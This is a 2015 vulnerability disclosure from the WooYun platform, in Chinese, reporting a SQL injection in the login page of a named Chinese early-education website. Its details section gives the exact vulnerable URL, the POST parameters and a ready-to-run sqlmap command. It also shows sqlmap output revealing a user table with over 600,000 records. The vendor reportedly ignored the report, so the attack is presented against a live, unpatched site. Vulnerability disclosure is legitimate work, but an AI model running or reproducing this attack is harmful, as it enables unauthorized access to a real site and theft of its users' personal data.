漏洞概要
关注数(24)
关注此漏洞
漏洞标题:凯尔幼教联盟网POST SQL注入漏洞(涉及60W+用户信息)
提交时间:2015-10-19 09:43
修复时间:2015-12-03 09:44
公开时间:2015-12-03 09:44
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2015-10-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
凯尔幼教联盟网POST SQL注入漏洞(涉及60W+用户信息)
详细说明:
注入点:
http://www.krbb.cn/login/chklogin.asp
POST数据:uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634
sqlmap语句:
python sqlmap.py -u "http://www.krbb.cn/login/chklogin.asp" --data "uid=88952634&pwd=88952634&cookieexists=false&yhm=88952634&leixing=1&mm=88952634"
sqlmap截图:

USER表太多了 检测了一个
Database: www_krbb_cn
+-------------+---------+
| Table | Entries |
+-------------+---------+
| dbo.Dv_User | 612629 |
所有用户的话 肯定进百万了
漏洞证明:
sqlmap全过程
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
评论